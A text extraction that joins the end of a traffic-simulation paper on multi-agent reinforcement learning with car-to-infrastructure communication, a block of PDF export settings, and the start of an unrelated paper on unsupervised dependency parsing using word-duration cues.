http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ This work thus has the following contributions: we employ MARL to the task of learning; we do this using a non trivial scenario with more than one origin-destination pair; we depart from the assumption that driver agents already know a set of (pre-computed) routes to select among; we use a microscopic, agent-based approach; we connect MARL with new communication technologies, in order to investigate whether the learning process can be accelerated. Also, we have employed our method to test some real-world situations that may arise, namely communication loses and the need to use simpler hardware devices to store information by the infrastructure. Our results show that, before deploying C2I communication in the real-world, one has to take into account the various effects of sharing information, even at local level. We were able to show that one has to strive to communicate information that is diverse enough, in order to avoid sub-optimal route choices, that is, those that are made by drivers having similar information. As these drivers tend to act greedly, a wise strategy on sharing information is key. Specifically, our results point out to our approach being tolerant to information loses; further, there was even a slight improvement in the overall performance (i.e., learning speed) since less information also mean that not all agents will act the same way. As for the different strategies regarding storage of information in the infrastructure, we could show that communicating only the latest known travel time is able to speed up the learning process. We remark that in all cases we have tested, MARL was able to reach the user equilibrium. The major difference is the speed of such process. For future work, one possible investigation is the addition of a biased information provided by the infrastructure in order to reach a different outcome, namely, to reach the system optimum (socially efficient distribution of routes to vehicles), rather than converging to the user equilibrium. We also plan to change the demand during simulation time, to check how the learners deal with such changes. Preliminary work on using Q-learning in such dynamic environments point out that it is able to handle different situations. However, it remains to be investigated whether this is also the case for changes in flow rates. Moreover, we would like to study whether the proposed combination of Q-learning with C2I is able to speed up the learning processes as much as it was the case in the present work. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by CNPq under grant no. 307215/2017-2 (Ana Bazzan), by CAPES (Coordenação de Aperfeiçoamento de Pessoal de Nível Superior—Brazil, Finance Code 001), and by a FAPERGS grant (Guilherme D. dos Santos). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 18/20 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ Grant Disclosures The following grant information was disclosed by the authors: CNPq: 307215/2017-2. CAPES (Coordenação de Aperfeiçoamento de Pessoal de Nível Superior—Brazil): 001. FAPERGS. Competing Interests The authors declare that they have no competing interests. Author Contributions � Guilherme Dytz dos Santos conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � Ana L.C. Bazzan conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code is available at GitHub: https://github.com/guidytz/SUMO-QL. REFERENCES Auld J, Verbas O, Stinson M. 2019. Agent-based dynamic traffic assignment with information mixing. Procedia Computer Science 151(3):864–869 DOI 10.1016/j.procs.2019.04.119. Bazzan ALC, Fehler M, Klügl F. 2006. Learning to coordinate in a network of social drivers: the role of information. In: Tuyls K, Hoen PJ, Verbeeck K, Sen S, eds. Proceedings of the International Workshop on Learning and Adaptation in MAS (LAMAS 2005), number 3898 in Lecture Notes in Artificial Intelligence. 115–128. Bazzan ALC, Grunitzki R. 2016. A multiagent reinforcement learning approach to en-route trip building. In: 2016 International Joint Conference on Neural Networks (IJCNN), 5288–5295. Bazzan ALC, Klügl F. 2020. Experience sharing in a traffic scenario. In: Proceedings of the 11th International Workshop on Agents in Traffic and Transportation, Santiago de Compostella. Buriol LS, Hirsh MJ, Pardalos PM, Querido T, Resende MG, Ritt M. 2010. A biased random-key genetic algorithm for road congestion minimization. Optimization Letters 4(4):619–633 DOI 10.1007/s11590-010-0226-6. Fachantidis A, Taylor ME, Vlahavas IP. 2019. Learning to teach reinforcement learning agents. Machine Learning and Knowledge Extraction 1(1):21–42 DOI 10.3390/make1010002. Grunitzki R, Bazzan ALC. 2016. Combining car-to-infrastructure communication and multi-agent reinforcement learning in route choice. In: Bazzan ALC, Klügl F, Ossowski S, Vizzari G, eds. Proceedings of the Ninth Workshop on Agents in Traffic and Transportation (ATT-2016). New York: CEUR-WS.org. Grunitzki R, Bazzan ALC. 2017. Comparing two multiagent reinforcement learning approaches for the traffic assignment problem. In: 2017 Brazilian Conference on Intelligent Systems (BRACIS). Koster A, Tettamanzi A, Bazzan ALC, Pereira CDC. 2013. Using trust and possibilistic reasoning to deal with untrustworthy communication in VANETs. In: Proceedings of the 16th IEEE dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 19/20 https://github.com/guidytz/SUMO-QL http://dx.doi.org/10.1016/j.procs.2019.04.119 http://dx.doi.org/10.1007/s11590-010-0226-6 http://dx.doi.org/10.3390/make1010002 http://dx.doi.org/10.7717/peerj-cs.428 https://peerj.com/computer-science/ Annual Conference on Intelligent Transport Systems (IEEE-ITSC), The Hague, The Netherlands. Piscataway: IEEE, 2355–2360. Lopez PA, Behrisch M, Bieker-Walz L, Erdmann J, Flötteröd Y-P, Hilbrich R, Lücken L, Rummel J, Wagner P, Wießner E. 2018. Microscopic traffic simulation using sumo. In: The 21st IEEE International Conference on Intelligent Transportation Systems. Piscataway: IEEE. Ortúzar JDD, Willumsen LG. 2011. Modelling transport. Fourth Edition. Chichester: John Wiley & Sons. Ramos GDO, Grunitzki R. 2015. An improved learning automata approach for the route choice problem. In: Koch F, Meneguzzi F, Lakkaraju K, eds. Agent Technology for Intelligent Mobile Services and Smart Societies, Volume 498 of Communications in Computer and Information Science. Berlin, Heidelberg: Springer, 56–67. Santos GDD, Bazzan ALC. 2020. Accelerating learning of route choices with C2I: a preliminary investigation. In: Proceedings of the VIII Symposium on Knowledge Discovery, Mining and Learning, SBC, 41–48. Sharon G, Hanna JP, Rambha T, Levin MW, Albert M, Boyles SD, Stone P. 2017. Real-time adaptive tolling scheme for optimized social welfare in traffic networks. In: Das S, Durfee E, Larson K, Winikoff M, eds. Proceedings of the 16th International Conference on Autonomous Agents and Multiagent Systems (AAMAS 2017). São Paulo: IFAAMAS, 828–836. Tan M. 1993. Multi-agent reinforcement learning: independent vs. cooperative agents. In: Proceedings of the Tenth International Conference on Machine Learning (ICML 1993). Morgan Kaufmann, 330–337. Tavares AR, Bazzan AL. 2014. An agent-based approach for road pricing: system-level performance and implications for drivers. Journal of the Brazilian Computer Society 20(1):15 DOI 10.1186/1678-4804-20-15. Taylor A, Dusparic I, López EG, Clarke S, Cahill V. 2014. Accelerating learning in multi-objective systems through transfer learning. In: International Joint Conference on Neural Networks (IJCNN), Beijing, China. Piscataway: IEEE, 2298–2305. Torrey L, Taylor ME. 2013. Teaching on a budget: agents advising agents in reinforcement learning. In: Proceedings of the 2013 International Conference on Autonomous Agents and Multi- Agent Systems, St. Paul, MN, USA, IFAAMAS. Tumer K, Welch ZT, Agogino A. 2008. Aligning social welfare and agent preferences to alleviate traffic congestion. In: Padgham L, Parkes D, Müller J, Parsons S, eds. Proceedings of the 7th International Conference on Autonomous Agents and Multiagent Systems. Estoril: IFAAMAS, 655–662. Wahle J, Bazzan ALC, Klügl F, Schreckenberg M. 2000. Decision dynamics in a traffic scenario. Physica A 287(3–4):669–681 DOI 10.1016/S0378-4371(00)00510-0. Wardrop JG. 1952. Some theoretical aspects of road traffic research. Proceedings of the Institution of Civil Engineers, Part II 1(36):325–362 DOI 10.1680/ipeds.1952.11259. Watkins CJCH, Dayan P. 1992. Q-learning. Machine Learning 8(3):279–292. Yu Y, Han K, Ochieng W. 2020. Day-to-day dynamic traffic assignment with imperfect information, bounded rationality and information sharing. Transportation Research Part C: Emerging Technologies 114(1):59–83 DOI 10.1016/j.trc.2020.02.004. Zhou B, Song Q, Zhao Z, Liu T. 2020. A reinforcement learning scheme for the equilibrium of the in-vehicle route choice problem based on congestion game. Applied Mathematics and Computation 371(12):124895 DOI 10.1016/j.amc.2019.124895. Zimmer M, Viappiani P, Weng P. 2014. Teacher-student framework: a reinforcement learning approach. In: AAMAS Workshop Autonomous Robots and Multirobot Systems, Paris, France. dos Santos and Bazzan (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.428 20/20 http://dx.doi.org/10.1186/1678-4804-20-15 http://dx.doi.org/10.1016/S0378-4371(00)00510-0 http://dx.doi.org/10.1680/ipeds.1952.11259 http://dx.doi.org/10.1016/j.trc.2020.02.004 http://dx.doi.org/10.1016/j.amc.2019.124895 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.428 Sharing diverse information gets driver agents to learn faster: an application in en route trip building Introduction Background and related work Methods Experiments, results, and analysis Conclusions and future work References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_3gk6cma2gndppblfkxoyk4sx3m ---- Unsupervised dependency parsing with acoustic cues John K Pate (j.k.pate@sms.ed.ac.uk) Sharon Goldwater (sgwater@inf.ed.ac.uk) School of Informatics, University of Edinburgh 10 Crichton St., Edinburgh EH8 9AB, UK Abstract Unsupervised parsing is a difficult task that infants readily perform. Progress has been made on this task using text-based models, but few computational approaches have considered how infants might benefit from acoustic cues. This paper explores the hypothesis that word duration can help with learning syntax. We de- scribe how duration information can be incor- porated into an unsupervised Bayesian depen- dency parser whose only other source of infor- mation is the words themselves (without punc- tuation or parts of speech). Our results, evalu- ated on both adult-directed and child-directed utterances, show that using word duration can improve parse quality relative to words-only baselines. These results support the idea that acoustic cues provide useful evidence about syntactic structure for language-learning in- fants, and motivate the use of word duration cues in NLP tasks with speech. 1 Introduction Unsupervised learning of syntax is difficult for NLP systems, yet infants perform this task routinely. Pre- vious work in NLP has focused on using the implicit syntactic information available in part-of-speech (POS) tags (Klein and Manning, 2004), punctuation (Seginer, 2007; Spitkovsky et al., 2011b; Ponvert et al., 2011), and syntactic similarities between related languages (Cohen and Smith, 2009; Cohen et al., 2011). However, these approaches likely use the data in a very different way from children: neither POS tags nor punctuation are observed during language acquisition (although see Spitkovsky et al. (2011a) and Christodoulopoulos et al. (2012) for encourag- ing results using unsupervised POS tags), and many children learn in a broadly monolingual environment. This paper explores a possible source of information that NLP systems typically ignore: word duration, or the length of time taken to pronounce each word. There are good reasons to think that word dura- tion might be useful for learning syntax. First, the well-established Prosodic Bootstrapping hypothesis (Gleitman and Wanner, 1982) proposes that infants use acoustic-prosodic cues (such as word duration) to help them identify syntactic structure, because prosodic and syntactic structures sometimes coincide. More recently, we proposed (Pate and Goldwater, 2011) that infants might use word duration as a di- rect cue to syntactic structure (i.e., without requir- ing intermediate prosodic structure), because words in high-probability syntactic structures tend to be pronounced more quickly (Gahl and Garnsey, 2004; Gahl et al., 2006; Tily et al., 2009). Like most recent work on unsupervised parsing, we focus on learning syntactic dependencies. Our work is based on Headden et al. (2009)’s Bayesian version of the Dependency Model with Valence (DMV) (Klein and Manning, 2004), using interpo- lated backoff techniques to incorporate multiple infor- mation sources per token. However, whereas Head- den et al. used words and POS tags as input, we use words and word duration information, presenting three variants of their model that use this information in slightly different ways.1 1By using neither gold-standard nor learned POS tags as input, our work differs from nearly all previous work on unsuper- vised dependency parsing. While learned tags might be plausible To our knowledge, this is the first work to incor- porate acoustic cues into an unsupervised system for learning full syntactic parses. The methods in this paper were inspired by our previous approach (Pate and Goldwater, 2011), which showed that word dura- tion measurements could improve the performance of an unsupervised lexicalized syntactic chunker over a words-only baseline. However, that work was lim- ited to HMM-like sequence models, tested on adult- directed speech (ADS) only, and none of the models outperformed uniform-branching baselines. Here, we extend our results to full dependency parsing, and experiment on transcripts of both spontaneous ADS and child-directed speech (CDS). Our models us- ing word duration outperform words-only baselines, along with the Common Cover Link parser of Seginer (2007), and the Unsupervised Partial Parser of Pon- vert et al. (2011), unsupervised lexicalized parsers that have obtained state-of-the-art results on standard newswire treebanks (though their performance here is worse, as our input lacks punctuation). We also outperform uniform-branching baselines. 2 Syntax and Word Duration Before presenting our models and experiments, we first discuss why word duration might be a useful cue to syntax. This section reviews the two possible rea- sons mentioned above: duration as a cue to prosodic structure, or as a cue to predictability. 2.1 Prosodic Bootstrapping Prosody is the structure of speech as conveyed by rhythm and intonation, which are, in turn, conveyed by such measurable phenomena as variation in fun- damental frequency, word duration, and spectral tilt. Prosodic structure is typically analyzed as imposing a shallow, hierarchical grouping structure on speech, with the ends of prosodic phrases (constituents) be- ing cued in part by lengthening the last word of the phrase (Beckman and Pierrehumbert, 1986). The Prosodic Bootstrapping hypothesis (Gleit- man and Wanner, 1982) points out that prosodic phrases are often also syntactic phrases, and proposes that language-acquiring infants exploit this correla- tion. Specifically, if infants can learn about prosodic phrase structure using word duration (and fundamen- in a model of language acquisition, gold tags certainly are not. tal frequency), they may be able to identify syntactic phrases more easily using word strings and prosodic trees than using word strings alone. Several behavioral experiments support the con- nection between prosody and syntax and the prosodic bootstrapping hypothesis specifically. For example, there is evidence that adults use prosodic information for syntactic disambiguation (Millotte et al., 2007; Price et al., 1991) and to help in learning the syntax of an artificial language (Morgan et al., 1987), while infants can use acoustic-prosodic cues for utterance- internal clause segmentation (Seidl, 2007). On the computational side, we are aware of only our previous HMM-based chunkers (Pate and Gold- water, 2011), which learned shallow syntax from words, words and word durations, or words and hand- annotated prosody. Using these chunkers, we found that using words plus prosodic annotation worked better than just words, and words plus word duration worked even better. While these results are consistent with the prosodic bootstrapping hypothesis, we sug- gested that predictability bootstrapping (see below) might be a more plausible explanation. Other computational work has combined prosody with syntax, but only in supervised systems, and typi- cally using hand-annotated prosodic information. For example, Huang and Harper (2010) used annotated prosodic breaks as a kind of punctuation in a su- pervised PCFG, while prosodic breaks learned in a semi-supervised way have been used as features for parse reranking (Kahn et al., 2005) or PCFG state- splitting (Dreyer and Shafran, 2007). In contrast to these methods, our approach observes neither parse trees nor prosodic annotations. 2.2 Predictability Bootstrapping On the basis of our HMM chunkers, we introduced the predictability bootstrapping hypothesis (Pate and Goldwater, 2011): the idea that word durations could be a useful cue to syntactic structure not (or not only) because they provide information about prosodic structure, but because they are a direct cue to syntac- tic predictability. It is well-established that talkers tend to pronounce words more quickly when they are more predictable, as measured by, e.g., word frequency, n-gram probability, or whether or not the word has been previously mentioned (Aylett and Turk, 2004; Bell et al., 2009). However, syntactic proba- you threw it right at the basket Figure 1: Example unlabeled dependency parse. bility also seems to matter, with studies showing that verbs tend to be pronounced more quickly when they are in their preferred syntactic frame—transitive vs. intransitive or direct object vs. sentential comple- ment (Gahl and Garnsey, 2004; Gahl et al., 2006; Tily et al., 2009). While this syntactic evidence is only for verbs, together with the evidence that effects of other notions of predictability, it suggests that such syntactic effects may also be widespread. If so, the duration of a word could give clues as to whether it is being used in a high-probability or low-probability structure, and thus what the correct structure is. We found that our syntactic chunkers benefited more from duration information than prosodic an- notations, providing some preliminary evidence in favor of predictability bootstrapping, but not ruling out prosodic bootstrapping. So, we are left with two plausible mechanisms by which word duration could help with learning syntax. Slow pronunciations may cue the end of a prosodic phrase, which is sometimes also the end of a syntactic phrase. Alternatively, slow pronunciations may indicate that the hidden syntactic structure is low probability, facilitating the induc- tion of a probabilistic grammar. This paper will not seek to determine which mechanism is useful, instead taking the presence of two possible mechanisms as encouraging for the prospect of incorporating word duration into unsupervised parsing. 3 Models2 As mentioned, we will be incorporating word dura- tion into unsupervised dependency parsing, produc- ing analyses like the one in Figure 1. Each arc is between two words, with the head at the non-arrow end of the arc, and the dependent at the arrow end. One word, the root, depends on no word, and all other words depend on exactly one word. Following previous work on unsupervised dependency parsing, we will not label the arcs. 2The implementation of these models is available at http://github.com/jpate/predictabilityParsing 3.1 Dependency Model with Valence All of our models are ultimately based on the De- pendency Model with Valence (DMV) of Klein and Manning (2004), a generative, probabilistic model for projective (i.e. no crossing arcs), unlabeled de- pendency parses, such as the one in Figure 1. The DMV generates dependency parses using three probability distributions, which together com- prise model parameters θ. First, the root of the sentence is drawn from Proot . Second, we decide whether to stop generating dependents of the head h in direction dir ∈ {left, right} with probability Pstop(·|h,dir,v), where v is T if h has a dir-ward dependent and F otherwise. If we decide to stop, then h takes no more dependents in the direction of dir. If we don’t stop, we use the third probability distribution Pchoose(d|h,dir) to determine which de- pendent d to generate. The second and third step repeat for each generated word until all words have stopped generating in both directions. The DMV was the first unsupervised parsing model to outperform a uniform-branching baseline on the Wall Street Journal corpus. It was trained using EM to obtain a maximum-likelihood estimate of the parameters θ, and learned from POS tags to avoid rare events. However, all work on syntactic predictability effects on word duration has been lexi- calized (looking at, e.g., the transitivity bias of par- ticular verbs). In addition, it is unlikely that children have access to the correct parts of speech when first learning syntactic structure. Thus, we want a DMV variant that learns from words rather than POS tags. We therefore adopt several extensions to the DMV due to Headden et al. (2009), described next. 3.2 The DMV with Backoff Headden et al. (2009) sought to improve the DMV by incorporating lexical information in addition to POS tags. However, arcs between particular words are rare, so they modified the DMV in two ways to deal with this sparsity. First, they switched from MLE to a Bayesian approach, estimating a probability distribu- tion over model parameters θ and dependency trees T given the training corpus C and a prior distribution α over models: P(T,θ|C,α). Headden et al. avoided overestimating the proba- bility of rare events that happen to occur in the train- ing data by picking α to assign low probability to models θ which give high probability to rare events. Accordingly, models that overcommit to rare events will contribute little to the final average over models. Specifically, Headden et al. use Dirichlet priors, with α being the Dirichlet hyperparameters. Headden et al.’s second innovation was to adapt in- terpolated backoff methods from language modeling with n-grams, where one can estimate the probabil- ity of word wn given word wn−1 by interpolating between unigram and bigram probability estimates: P̂(wn|wn−1) = λP(wn|wn−1) + (1−λ)P(wn) with λ ∈ [0,1]. Ideally, λ should be large when wn−1 is frequent, and small when wn−1 is rare. Headden et al. (2009) apply this method to the DMV by backing off from Choose and Stop distributions that condition on both head word and POS to distributions that condition on only the head POS. In the equation above, λ is a scalar parameter. However, it actually specifies a probability distri- bution over the decision to back off (B) or not back off (¬B), and we can use different notation to reflect this view. Specifically, λstop(·) and λchoose(·) will represent our backoff distributions for the Stop and Choose decision, respectively. Using hp and dp to represent head and dependent POS tag and hw and dw to represent head and dependent word, one of the models Headden et al. explored estimates: P̂ choose(dp|hw,hp,dir,val) = λchoose(¬B|hw,hp,dir)Pchoose(dp|hw,hp,dir) +λchoose(B|hw,hp,dir)Pchoose(dp|hp,dir) (1) with an analogous backoff for Pstop . We can see from Equation 1 that P̂choose backs off from a dis- tribution that conditions on hw to a distribution that marginalizes out hw, and that the extent of backoff varies across hw; we can use this to back off more when we have less evidence about hw. This model only conditions on words; it does not generate them in the dependents. This means it is actually a condi- tional, rather than fully generative, model of observed POS tags and unobserved syntax conditioned on the observed words. Since identifying the true posterior distribution P(T,θ|C,α) is intractable, Headden et al. use Mean- field Variational Bayes (Kurihara and Sato, 2006; Johnson, 2007), which finds an approximation to the posterior using an iterative EM-like algorithm. In the E-step of VBEM, expected counts E(ri ) are gathered for each latent variable using the Inside-Outside algo- rithm, exactly as in the E-step of traditional EM. The Maximization step differs from the M-Step of EM in two ways. First, the expected counts for each value of the latent variable xi are incremented by the hy- perparameter αi. Second, the numerator and denom- inator are scaled by the function exp(ψ(·)), which reduces the probability of rare events. Specifically, the Pchoose distribution is estimated using expecta- tions for each arc adp,h,dir from head h to dependent POS tag dp in direction dir, and the update equation for Pchoose from iteration n to n + 1 is: P̂n+1choose(dp|h,dir) = exp(ψ(En(adp,h,dir ) + αdp,h,dir )) exp(ψ( ∑ c(E n(ac,h,dir ) + αc,h,dir ))) (2) where h is the head POS tag for the backoff distri- bution, and the head (word, POS) pair for the no backoff distribution. The update equation for Pstop is analogous. Now consider the update equations for λchoose : λ̂n+1choose(¬B|hw,hp,dir) = exp(ψ(α¬B + ∑ c(E n(ac,hw,hp,dir )))) exp(ψ(αB + α¬B + ∑ c(E n(ac,hw,hp,dir )))) λ̂n+1choose(B|hw,hp,dir) = exp(ψ(αB)) exp(ψ(αB + α¬B + ∑ c(E n(ac,hw,hp,dir )))) Only the ¬B numerator includes the expected counts, so as we see hw in direction dir more often, the ¬B numerator will swamp the B numerator. By picking αB larger than α¬B, we can bias our λ distribution to prefer backing off until we expect at least αB −α¬B arcs out of hw with tag hp in the direction of dir. To obtain good performance, Headden et al. re- placed each word that appeared fewer than 100 times in the training data with the token “UNK.” We will also use such an UNK cutoff. 3.3 DMV with Duration We explore three models. One is a straightforward application of the DMV with Backoff to words and (quantized) word duration, and the other two are fully- generative variants. We also consider using words and POS tags as input to these models. Backoff mod- els are given two streams of information, providing two of word identity, POS tag, or word duration for each observed token. We call one stream the “back- off” stream, and the other the “extra” stream. Backoff models learn a probability distribution conditioning on both streams, backing off to condition on only the backoff stream. Our first words and duration model takes the du- ration as the extra stream and the word identity as the backoff stream, and, using ha to represent the acoustic information for the head, defines: P̂ choose(dw|hw,ha,dir) = λchoose(¬B|hw,ha,dir)Pchoose(dw|hw,ha,dir) +λchoose(B|hw,ha,dir)Pchoose(dw|hw,dir) (3) with an analogous backoff scheme for Pstop . We will refer to this conditional model as “Cond.” in our experiments. This equation is similar to Equation 1, except it uses words and duration instead of words and POS tags, and backs off to, not away from, words. We back off to the sparse words, rather than the less sparse duration, because duration provides almost no information about syntax in isolation.3 Directly modelling the extra stream among the dependents may allow us to capture selectional re- strictions in POS and words models, or exploit ef- fects of syntactic predictability on dependent dura- tion. We therefore explore variants that generate both streams in the dependents. First, we examine a model (“Joint”) that generates them jointly: P̂choose(dw,da|hw,hp,dir) = λchoose(¬B|hw,ha,dir) Pchoose(dw,da|hw,ha,dir) +λchoose(B|hw,ha,dir) Pchoose(dw,da|hw,dir) (4) However, this joint model will have a very large state- space and may suffer from the same data sparsity, so we also explore a model (“Indep.”) that generates the 3Preliminary dev-set experiments confirmed this intuition, as models that backed off to word duration performed poorly. extra and backoff independently: P̂choose(dw,da|hw,hp,dir) = λchoose(¬B|hw,ha,dir) Pchoose backoff (dw|hw,ha,dir) Pchoose extra (da|hw,ha,dir) + λchoose(B|hw,ha,dir) Pchoose backoff (dw|hw,dir) Pchoose extra (da|hw,dir) (5) We also modified the DMV with Backoff to handle heavily lexicalized models. In Headden et al. (2009), arcs between words that never appear in the same sentence are given probability mass only by virtue of the backoff distribution to POS tags, which all appear in the same sentence at least once. We want to both avoid relying on POS tags, and we also want to use held-out development and test sets to avoid implicitly overfitting the data when exploring different model structures. To this end, we add one extra αUNK hyper- parameter to the Dirichlet prior of Pchoose for each combination of conditioning events. This hyperpa- rameter reserves probability mass for a head h to take a word dw as a dependent if h and dw never appeared together in the training data. The amount of probabil- ity mass reserved decreases as we see hw more often. This is implemented in training by adding αUNK to the denominator of the Pchoose update equation for each h and dir. At test time, if a word dw appears as an unseen dependent for head h, h takes dw as a dependent with probability: P̂ choose(dw|h,dir) = (6) exp(ψ(αUNK)) exp(ψ(αUNK + ∑ c(E last(rc,h,dir ) + αc,h,dir ))) Here, h may be a word, (word, POS) pair, or (word, duration) pair. Since this event by definition never occurs in the training data, αUNK does not appear in the numerator during training. 4 4Note also that αUNK is different from a global UNK cutoff, which is imposed in preprocessing, and so effects every occur- rence of an an UNK’d word in the model. αUNK affects only dependents in Pchoose , and treats a dependent as UNK iff it did not occur on that particular side of that particular head word in any sentence. We used both global UNK cutoffs (optimized on the dev set) and these αUNK hyperparameters. Train Dev Test w s j 1 0 Word tokens 42,505 1,765 2,571 Word types 7,804 818 1,134 Sentences 6,007 233 357 s w b d n x t 1 0 Word tokens 24,998 2,980 3,052 Word types 2,647 760 767 Sentences 3,998 488 491 b r e n t Word tokens 20,954 2,127 2,206 Word types 1,390 482 488 Sentences 6,249 424 449 Table 1: Statistics for our three corpora. Finally, the conditional model ignores the extra stream in Proot , and the generative models estimate Proot over both streams jointly. 4 Experimental Setup 4.1 Datasets We evaluate on three datasets: wsj10, sentences of length 10 or less from the Wall Street Journal por- tion of the Penn Treebank; swbdnxt10, sentences of length 10 or less from the Switchboard dataset of ADS used by Pate and Goldwater (2011); and brent, part of the Brent corpus of CDS (Brent and Siskind, 2001). Table 1 presents corpus statistics. 4.1.1 wsj10 We present a new evaluation of the DMV with Backoff on wsj10, which does not have any acous- tic information, simply to verify that αUNK performs sensibly on a standard corpus. Additionally, Headden et al. (2009) use an intensive initializer that relies on dozens of random restarts, and so, strictly speaking, only show that the backoff technology is useful for good initializations. Our new evaluation will show that the backoff technology provides a substantial benefit even for harmonic initialization. wsj10 was created in the standard way; all punc- tuation and traces were removed, and sentences con- taining more than ten tokens were discarded. For our fully lexicalized version of wsj10, all words were lowercased, and numbers were replaced with the token “NUMBER.”5 Following standard practice, we used sections 2-21 for training, section 22 for development, and section 23 for test. wsj10 con- tains hand-annotated constituency parses, not depen- 5Numbers were treated in this way only in wsj10. dency parses, so we used the standard “constituency- to-dependency” conversion tool of Johansson and Nugues (2007) to obtain high-quality CoNLL-style dependency parses. 4.1.2 swbdnxt10 Next, we evaluate on swbdnxt10, which con- tains all sentences up to length 10 